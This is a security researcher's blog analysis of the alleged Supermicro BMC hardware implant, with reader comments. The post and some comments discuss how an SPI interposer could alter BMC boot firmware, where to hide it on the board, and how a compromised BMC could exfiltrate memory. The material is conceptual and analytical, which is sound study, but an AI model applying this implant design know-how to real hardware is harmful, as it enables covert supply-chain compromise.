Making sense of the Supermicro motherboard attack

There has been a lot of ‘fog of war’ regarding the alleged implantation of Trojan hardware into Supermicro servers at manufacturing time. Other analyses have cast doubt on the story. But do all the pieces pass the sniff test?

In brief, the allegation is that an implant was added at manufacturing time, attached to the Baseboard Management Controller (BMC). When a desktop computer has a problem, common approaches are to reboot it or to reinstall the operating system. However in a datacenter it isn’t possible to physically walk up to the machine to do these things, so the BMC allows administrators to do them over the network.

Crucially, because the BMC has the ability to install the operating system, it can disrupt the process that boots the operating system – and fetch potentially malicious implant code, maybe even over the Internet.

The Bloomberg Businessweek reports are low on technical details, but they do show two interesting things. The first is a picture of the alleged implant. This shows a 6-pin silicon chip inside a roughly 1mm x 2mm ceramic package – as often used for capacitors and other so-called ‘passive’ components, which are typically overlooked.

The other is an animation highlighting this implant chip on a motherboard. Extracting the images from this animation shows the base image is of a Supermicro B1DRi board. As others have noted, this is mounted in a spare footprint between the BMC chip and a Serial-Peripheral Interface (SPI) flash chip that likely contains the BMC’s firmware. Perhaps the animation is an artist’s concept only, but this is just the right place to compromise the BMC.

SPI is a popular format for firmware flash memories – it’s a relatively simple, relatively slow interface, using only four signal wires. Quad SPI (QSPI), a faster version, uses six wires for faster transmission. The Supermicro board here appears to have a QSPI chip, but also a space for an SPI chip as a manufacturing-time option. The alleged implant is mounted in part of the space where the SPI chip would go. Limited interception or modification of SPI communication is something that a medium complexity digital chip (a basic custom chip, or an off-the-shelf programmable CPLD) could do – but not to a great extent. Six pins is enough to intercept the four SPI wires, plus two power. The packaging of this implant would, however, be completely custom.

What can an implant attached to the SPI wires do? The BMC itself is a computer, running an operating system which is stored in the SPI flash chip. The manual for a MBI-6128R-T2 server containing the B1DRi shows it has an AST2400 BMC chip.

The AST2400 uses a relatively old technology – a single-core 400MHz ARM9 CPU, broadly equivalent to a cellphone from the mid 2000s. Its firmware can come via SPI.

I downloaded the B1DRi BMC firmware from the Supermicro website and did some preliminary disassembly. The AST2400 in this firmware appears to run Linux, which is plausible given it supports complicated peripherals such as PCI Express graphics and USB. (It is not news to many of us working in this field that every system already has a Linux operating system running on an ARM CPU, before power is even applied to the main Intel CPUs — but many others may find this surprising).

It is possible that the implant simply replaces the entire BMC firmware, but there is another way.

In order to start its own Linux, AST2400 boots using the U-Boot bootloader. I noticed one of the options is for the AST2400 to pick up its Linux OS over the network (via TFTP or NFS). If (and it’s a substantial if) this is enabled in the AST2400 bootloader, it would not take a huge amount of modification to the SPI contents to divert the boot path so that the BMC fetched its firmware over the network (and potentially the Internet, subject to outbound firewalls).

Once the BMC operating system is compromised, it can then tamper with the main operating system. An obvious path would be to insert malicious code at boot time, via PCI Option ROMs. However, after such vulnerabilities came to light, defenses have been increased in this area.

But there’s another trick a bad BMC can do — it can simply read and write main memory once the machine is booted. The BMC is well-placed to do this, sitting on the PCI Express interconnect since it implements a basic graphics card. This means it potentially has access to large parts of system memory, and so all the data that might be stored on the server. Since the BMC also has access to the network, it’s feasible to exfiltrate that data over the Internet.

So this raises a critical question: how well is the BMC firmware defended? The BMC firmware download contains raw ARM code, and is exactly 32MiB in size. 32MiB is a common size of an SPI flash chip, and suggests this firmware image is written directly to the SPI flash at manufacture without further processing. Additionally, there’s the OpenBMC open source project which supports the AST2400. From what I can find, installing OpenBMC on the AST2400 does not require any code signing or validation process, and so modifying the firmware (for good or ill) looks quite feasible.

Where does this leave us? There are few facts, and much supposition. However, the following scenario does seem to make sense. Let’s assume an implant was added to the motherboard at manufacture time. This needed modification of both the board design, and the robotic component installation process. It intercepts the SPI lines between the flash and the BMC controller. Unless the implant was designed with a very high technology, it may be enough to simply divert the boot process to fetch firmware over the network (either the Internet or a compromised server in the organisation), and all the complex attacks build from there — possibly using PCI Express and/or the BMC for exfiltration.

If the implant is less sophisticated than others have assumed, it may be feasible to block it by firewalling traffic from the BMC — but I can’t see many current owners of such a board wanting to take that risk.

So, finally, what do we learn? In essence, this story seems to pass the sniff test. But it is likely news to many people that their systems are a lot more complex than they thought, and in that complexity can lurk surprising vulnerabilities.

Dr A. Theodore Markettos is a Senior Research Associate in hardware and platform security at the University of Cambridge, Department of Computer Science and Technology.

34 thoughts on “Making sense of the Supermicro motherboard attack

  1. If the BMC was indeed compromised during manufacture time, why wouldn’t they simply flash a malicious firmware? Seems a lot easier than investing all the time necessary to fabricate a custom six pin passive ceramic lookalike CPLD to twiddle with SPI lines.

    1. I think Charles Elegans is right. Most people never update the firmware on their BMC, whether iLo or IPMI or DRAC, and I’m sure it would be possible to have a nefarious version of the firmware lurking there indefinitely. An attacker could probably ensure any updates download new firmware from an alternative server with compromised code.

    2. Very simple. what if the machine you eventually want to compromise is a ship fab machine? the firmware you might want to compromise is a new design.

      sooner or later those fist gen modded board are put in to next gen ship fabrication machines….

      Eg. machines hacking and modding future machines. one robot hardware hacking a future gen robot.

  2. They could flash malicious firmware in the factory, but typically purchasers update the firmware regularly. Indeed Bloomberg mentioned there was a separate incident where the network card firmware update mechanism had been compromised. In this case, a malicious factory firmware would only survive on un-updated servers. An implant would persist over firmware update, subject to whatever software it modifies not changing too drastically.

  3. Certainly the attack vector can be plausible in and of itself, but the story contains more than this. The story also rely exclusively on anonomous sources, and what’s more, is behing vehemetly denied by the involved SMC customers such as Apple: https://www.apple.com/newsroom/2018/10/what-businessweek-got-wrong-about-apple/

    The story is all of this, not just the supposed attack (vector). And the story vs. Apples refutation of it comes nowhere near passing the sniff test, in my opinion. It requires a pretty sizeable conspiracy to work, and that’s a very bad sign for the veracity of this story in its entirety.

    1. We’re talking a near-superpower, which gives you all the conspiracy you need. Also, I know everyone screams “Fake news!” today, but it’s inconceivable a reputable publication would make things up or use disreputable sources. On the other hand, of course Apple is going to deny they were compromised, especially if they were told to keep quiet by law enforcement or intelligence agencies.

      1. Once you invoke a massive, undetectable conspiracy with unlimited capabilities you are into the realm of faith, not science. It is not falsifiable: absence of evidence is proof of success of the conspiracy, evidence against its existence is cover, denials are in bad faith.

        On the other hand, British intelligence failed to notice Philby et al, American intelligence allowed a contractor to walk out of the building with a load of compartmentalised top secret, Russian intelligence are currently registering their cars to the office and issuing sequential passports. Now you might claim this is in fact distraction, and there is another, more secret intelligence service hiding behind the incompetence, or something, but at face value the claim that the Chinese Intellignce services are immensely capable and leakproof requires a certain amount of exceptionalism.

        All anyone needs to make the story fly is produce a couple of motherboards with the claimed implant and a brief description of their provenance and operation. And explains how its exfiltration went undetected by the almost limitless network monitoring capabilities of major cloud providers.

        Other possibilities: the story is wrong. The story is about a failed attempt which was stymied by network monitoring. The story is a cover for something else. The story is an elaborate attempt by western intelligence services to highlight supply chain risks. But most likely: it’s just wrong, at best a wild overegging of a very small pudding. As with cold fusion, where many reputations would have benefitted from a waiting until proof it was happening before theorising as to how it happens, in this case evidence there is something to explain might be useful.

  4. Don’t companies like Amazon cycle through servers all the time? Wouldn’t there be 1000s of these boards on eBay at any given moment? If this sorry it’s real I’d expect to see physical evidence soon. I’m surprised Bloomberg didn’t show any. I wonder if they tried.

  5. Step aside. I’m a HPC cluster administrator. 🙂

    I’ll try to answer some points as concise as I can.

    First of all, no, these servers are not continuously cycled in the data centers. Even in HPC, you can use your resources for ~5 years. You just move your slowest tier down, buy a new generation of servers and make it top tier, and move all other hardware down a tier. So, in normal cases they should leave Amazon’s warehouses in three to five years in normal circumstances.

    While I’m not certain, Amazon’s data centers are extremely dense. They don’t use 1U servers. At least they are using blades, or custom built open computing hardware, which are extremely barebones.

    In the BMC firmware front, it depends. We generally update our BMC firmware to latest release alongside system BIOS before getting our servers online. So the systems are completely flashed before we start to use them. Also, OS is installed by us directly over ethernet. No BMC is involved here.

    Most importantly, in a sane setup, your BMC connection cannot access internet. You should build an isolated intranet for it (including VLAN or hardware isolation, not just subnet/IP), and put a VPN in the front gate. As a result, you login to your data center, or go to there if you like metaphors. If nobody’s there via VPN, BMC network is a silent and dark place. No connection to outside, no unknown traffic, just silence. Only exception may be the discovery packets of some BMCs, which can find similar servers and form federations for easier management. Even this needs some setup beforehand.

    If you have any more questions I’d try to help.

    1. I agree with this analysis – this is the piece that isn’t a perfect fit. Common practice is to firewall inbound traffic to the BMC VLAN, but it may be that some sites don’t firewall outbound traffic: embedded devices fetching their own firmware updates from the internet is a common design pattern (though not as much for BMCs). Additionally, protocols such as NFS are fragile over the Internet.

      One option the BMC has is it can simply send using the main network controller, which it can typically access via PCIe. That won’t be limited to the BMC VLAN. Additionally (and I haven’t checked for this board), many boards share the same ethernet port between BMC and main network controller – so the BMC can simply emit packets with the ‘wrong’ VLAN. Both of those would likely need more code modification than a simple boot-time divert. It would need more delving into the firmware to find out what would be feasible.

      1. In a BMC management scenario, or remote deployment scenario the OS is not installed over internet. You deploy the management & deployment services in premises. A server and some storage is generally enough. So, you don’t run NFS over internet.

        If you isolate the BMC network properly, there’s nowhere called “outside”. Internet just doesn’t route / reach there. So your BMCs cannot see the internet with or without you. I don’t think Amazon / Google / Apple will do something different. Because isolation is very cheap even from administration standpoint.

        The shared BMC option is something short of a marvel, because there’s a multiplexer in place. I don’t think you can emit via wrong VLAN, because you don’t see the BMC’s ethernet card on the PCIe bus. It’s just isn’t there. The port acts as two cards. VLAN use is completely optional even in shared scenario because you see two MACs when both OS and BMC requests IPs via DHCP. So they use the same port, without knowing each other. At least the servers we have acts like it.

        1. However the BMC also sits on PCIe as a VGA card, so it can access the ‘main’ NIC via that route. There was also a paper recently where the DIMM and ethernet PHY happened to be on the same I2C bus and the DIMM could thus send ethernet packets.

          All of this needs more complexity that simply rewriting the address of the TFTP server – it just depends what capability you have.

          1. Yeah, you might be right, but it also depends IMHO.

            The BMCs we use get the same output from the normal VGA cards of the boards, which are generally built by Matrox. I think they got the digital output before the DAC for VGA conversion. I just checked a server and it was the case. Similarly the BMC was not present on the PCI bus as a device.

            I think the capability of the exploit is highly dependent on how BMC is wired, and how deep its access is. While a BMC can run amok on the board, and can see very fine details of it, it’s somewhat air gapped from making great damage.

            Honestly I didn’t read any technical specs and pinouts of common BMCs. Some of the latest ones can change BIOS setups and whatnot. So, this is a very delicate matter and needs much more detailed inspection IMHO. But it seems the attack is NOT that easy to accomplish. This is my opinion when I look with my experience.

            The attacks are real or not, we will discuss it for a very long time and it’ll lead to some changes inevitably.

          2. I’m curious, Do you have a link to that paper where DIMM could send ethernet packets?

          3. In the Bloomberg article, it is said that Amazon could find some activity only in their Chinese DC, which would match with contacting a local server. The Internet scenario seems a bit far-fetched. Although it might be possible and that may have help detect the malicious chip while conducting some tests with full internet access to the BMC.

            Although I’m curious about how you would be able to intercept QSPI with only 4 wire without any need for a clock ?

    2. I can’t speak for the others, but I do know a fair bit about AWS’ machine room technologies. Here’s what I can say publicly.

      AWS design and fabricate substantial elements of their servers and infrastructure themselves, down to and including bespoke silicon design. And by that I don’t mean custom FPGAs, I’m talking about from-scratch silicon incorporating their proprietary networking protocols and other technologies. This is a substantial part of how they manage costs, and minimise energy consumption and heat production.

      It seems to me vanishingly unlikely, given their general philosophy, that AWS would be buying in commercial off-the-shelf Supermicro hardware like this.

      1. This is very interesting point. YES indeed Amazon is publically well known for Do It Ourselves.

        However that is a case when Amazon’s outsourcing deal ends up mediocre, though it is true that Amazon will immediatly run Do-It-Ourselves if Amazon ever considers that such matter is being mediocre…

        (AWS is golden example. CEO of Amazon was not happy and ordered entire employees to follow new instruction, which eventually ended up with AWS… Amazon is this kind of corperation.)
        (Also Amazon had project for realizing dream of same day delivery, by using local so called quick deliveries. It… wasnt super sucessful. Then Amazon began researching drone delivery)

  6. Thanks for this article, nice read! –at least, given the little and vague information presented by Bloomberg.
    I can understand the story passes the sniff test from an electronic engineering stand point. What I find extremely hard to believe is that no one ever noticed a single sign of strange incoming/outgoing traffic at the firewall level.
    And although, yeah, some companies are negligent security-wise and have an abandoned firewall at the most, it’s critical to keep in mind that the kind of hardware carrying the payload is commonly used as well in companies that are extremely rigorous when it comes to security. And no one ever noticed a single bit of unusual traffic? I don’t buy it.

    1. That’s what I’ve been thinking about too. They say in Bloomberg that these altered boards have been used by US military in some critical systems and they have noticed any abnormal outbound traffic hitting their firewall?? BS!

      Someone close to authors of Bloomberg story are making good money with shorting Supermicro.

  7. hardware design engineer here.

    two problems with the idea of spoofing the unpopulated SPI flash.

    1) Just placing the “device” in the vicinity of the unpopulated flash chip wouldn’t accomplish anything. according to bloomberg’s mockup it would just be sitting on top of some soldermask. you would need to rework with tiny wires connecting the device to either the unused pads, or the traces after scraping the mask off. Either way it would be obvious.

    2) SPI devices share the same data bus (MISO), and are activated by a chip select signal (CS). Since the unpopulated part is an option for different densities or package sizes, likely the CS line is shared. The real Flash, and the “device” would both be driving the data bus at the same time, resulting in bus contention. It wouldn’t work.

    1. 1) yes, you would need to modify the board layout files (Gerbers) – you couldn’t do it just at solder-time, unless you added some conspicuous wiring. The photos in the Twitter thread I linked to are just a few pixels around pins 6/7/8 of the SPI flash footprint, so it’s hard to verify at this point.

      2) for that, you just need to drive harder than the genuine chip. The datasheet of a 32MiB flash chip used on other server BMCs doesn’t state a drive current, but I suspect the pins can drive a few milliamps. If you can drive it at a large current – tens of mA – you can force signals high or low, even if the other side is driving to the opposite.

  8. Re 2), the MX25L25635F datasheet specs Voh and Vol at 100uA, but you’re right, that doesn’t actually tell you the maximum drive capability. It shouldn’t matter, though. Given that you’re modifying the layout (hacking the Gerbers and the pick-and-place data is fairly trivial), you only need 6 pins to have Vdd, Gnd, Clk_In, Data_In, Data_Out, and Chip_Select_n. So you can just interpose yourself in the data line. In inactive mode, you simply pass the data through. The additional few nanoseconds of buffer delay won’t hurt on an SPI interface. In active mode you replace bits as needed. The boot sequence of the AST2400 is probably entirely predictable, so you wouldn’t necessarily need to monitor MOSI for commands. Just look for CS_n and count clocks to know where you are in the data.

    That said, I’m very suspicious of all this speculation based on a few graphics in the Bloomberg article. It seems plausible that someone said, “Just put in a picture of one of those little chip thingies,” so they did. The fact that it looks like a TDK HHM-series monolithic balun doesn’t add much credibility to the case. That would definitely look out of place in that area of the board, and embedding a silicon chip in a monolithic ceramic package, if possible, seems much more trouble than it’s worth. In fact, I take issue with the statement in the article, “This shows a 6-pin silicon chip inside a roughly 1mm x 2mm ceramic package.” The square mark that the author seems to be interpreting as a silicon chip is merely an orientation mark for the package. (Cf. https://product.tdk.com/info/en/documents/data_sheet/rf_balun_hhm1522a7_en.pdf)

    Were I doing this, I’d be much more likely to put it in an SOT-563 (1.7mm sq.) or SOT-963 (1.05mm sq.) package. It’s much easier to implement, and would look less out of place on the board. On the other hand, since at least some versions of the board seem to have non-overlapping footprints for the 8-pin and 16-pin flavors of flash chip, I would consider putting the rogue chip in one of those footprints, labeled as a legitimate part. Even if someone noticed, they’d be more inclined to think that it was a simple manufacturing screw-up and both parts got loaded, and without thinking about it too hard one might just accept that it was working in spite of that.

  9. I think there are a few important pieces missing from this analysis:

    1. In a follow up story from Bloomberg they outlined to software side of the hack. The Supermicro portal where customers would download official firmware was also hacked at the same time.
    2. The hacked website was then used to deliver maliciously modifier firmware onto supermicro servers.

    Why is this important?

    The compromised firmware is IMO where all the actual malicious code actually resided. From here an attacker could basically do whatever they wanted with a target machine.

    By hacking the actual trusted source portal where a customer would download what they would believe to be trusted firmware the hackers ensured that any updates or reflashes of firmware would guarantee the malicious code was in place.

    But if they hacked the firmware and website why bother with the hardware hack?

    To me, this was the truly clever part of the deception. One goal of a nation-state level attacker would be to ensure the hack would go undetected for as long as possible. One way to hide the hacked firmware is to only trigger it under a very specific condition – the presence of the “spy chip” on the SPI line.

    Supermicro builds thousands of motherboards for all different clients. As we know the fabrication is done offshore with a contractor in China. That contractor would have the capacity to handle every day production. However, when large companies like Facebook, Apple, or Amazon are placing orders they typically aren’t ordering a small number. These large orders cause the Chinese contractor to push fabrication of that surge demand to sub-contractors. It’s these sub-contractors which were targeted by the hardware hack.

    By targeting the surge sub-contractors the hacker could ensure that the malicious code in the firmware would only be triggered when installed on servers which were part of very large orders. This reduction in overall attack surface means that whatever the bad code was doing would be much harder to detect vs if it was just in the wild running on all Supermicro motherboards.

    Ultimately with this method the “spy chip” itself would have to do very little. Maybe just change a single bit at a predetermined address in the firmware as it was being loaded by the BMC. From there the modified firmware code would kick into action.

    1. Also just to add to this, I think the idea that the “spy chip” would be used to network boot the BMC very unlikely. This would be detected almost immediately especially in an air gapped environment.

    2. Why all the trouble with a custom chip then? You could just use a common resistor and place it on a spare footprint connected to the BMC or remove one that should go in. You’d just have to modify the Pick ‘n Place program for that, not the Gerbers or the BOM.

      Using resistors or solderbridges on spare footprints to let a common firmware differentiate several board revisions is a common technique. The firmware activates internal pullups or pulldowns and reads the response. If there is a resistor connected, the response will be different than if there were none.

      Using a bog standard part that is already placed a few times on this board would make detection on a hardware level much more difficult.

      So if the story is true, I think the secret components on the board have a bigger role than just serving to identify the boards.

      1. That’s a fair point and I think you are probably correct that the chip had a bigger role. Given the firmware and website was also hacked though it seems likely that the chip was less sophisticated than some are indicating it would have to be.

  10. Why would they go to the rather dangerously obvious effort of modifying the circuit boards? I would have just packaged up the spy and the BMC chip dies into the BMC package (or making a clone BMC die with the spy chip circuitry on it). Detecting it there would be much more difficult.

  11. Bloomberg is full of crap. They aren’t reliable and are pretty consistently anti-Apple.

    This is breathless nonsense from non-technical people.

    If Bloomberg has some evidence, as in actual compromises, they can spill the beans. If their anonymous sources are legit, who are they? An accusation of this magnitude needs a little more than “Trust me” from an untrustworthy and biased source.

    I call BS, loud and clear.

  12. There is a question that I don’t see many asking which is important is, “How many rouge motherboards are needed to infect an entire server farm?”…

    As others have noted that,

    “If you isolate the BMC network properly, there’s nowhere called “outside”. ”

    But there is “inside” the BMC network, for a single rougue motherboard to play in.

    If I was an attacker looking to be covert, yes my first point of attack would be software not hardware, the problem is as others have noted making it stick with standard proceadure being a reflash.

    Thus I would put in a couple of apparently minor bugs in the BMC sorce software where they would go unnoticed (variois *nix bugs have been known to persist for years). That independently would achive little, but together achive a great deal more than the sum of their parts.

    Knowing where the software bugs are alows me to use them from a rougue motherboard across the BMC network regardless of if it is connected to the outside or not.

    Further there is an assumption about the supply chain which is hardware implants are targeted from the last link in the supply chain before the customer, because using the first links up at the manufacturing end is not controlable thus everybody would get a rougue motherboard.

    The military and similar have known about this for years which is why they try to do blind random purchases.

    But economics of server farms is you buy a lot of boards in one go and as close to the manufacturer as possible. Which means the manufacture gets to see unusuall purchase patterns, that they only need put one rougue motherboard in each unusuall purchase.

    As the end customer how many of the motherboards in a batch do you test at goods inwards?

    Well it depends on the test, basic functionality etc all the boards. But as the cost of the test rises you go to random testing. When it comes to “destructive testing” which finding hardware implants would require then very few to none would be the economic answer.

    So whilst I actually doubt the Bloomberg story, I can see how I would go about doing things as covertly as possible to establish a toe hold and push it to being a foothold.

    Once you have a foothold other more normal techniques could and more importantly would be used. The reason for “would” is the equivalent of “plaudable deniability” that is if you give some one an attack vector they have seen before or very similar before, what is the likely hood they are going to jump of and spend mote than a half million dollars doing a speculative hunt for a hardware implant?

    As Ross Anderson should be able to tell you “economics favours the attacker not the defender”. Especially when dealing with level three type attackers (State level and well funded corporates).

  13. The BMC must contain an enet device driver. Why not disable that device in BIOS, leave it unplugged, and install a new ethernet card with a different chip? The OS can handle it, but the stripped-down “linux” on the BMC is left dangling. Why wouldn’t that work?

  14. Putting two footprints on a PCB for (eg) two different spi flash chips so that one OR the other can be installed is common practice. Accidentally installing both flash chips due to (eg) a BOM error is not unheard of either.

  15. Tech nowdays have way too much “virtually-black-sites.”

    Who even knows what Windows automatic maintenance exactly do? Who even knows why Windoes compornant gets corrupted so easily, making users to ru DISM -restorehealth blah blah?

    I am quite concerend about tech professionals getting more and more isolated from end users. This is NOT a healthy display.

    Such virtually black sites of tech was always been a gray sites. However it was “gary” sites. If user decides to have some brain suffering, detail was actually accessible.

    Now? Again, what Windows Automatic Miantenance even do? If you check disk activities, WAM is obviously far off from normal malicious code check and etc. (Though it do run windows defender sometimsa) Microsoft never tells whats behind this virtually.black site.

    Being straight and honest (and a bit offensive)
    Tech nowday is so lazy, putting gray sites into far more invisivble zone.

    – Sucess of Malwarebytes tells something about this, is not it?

Leave a Reply

Your email address will not be published. Required fields are marked *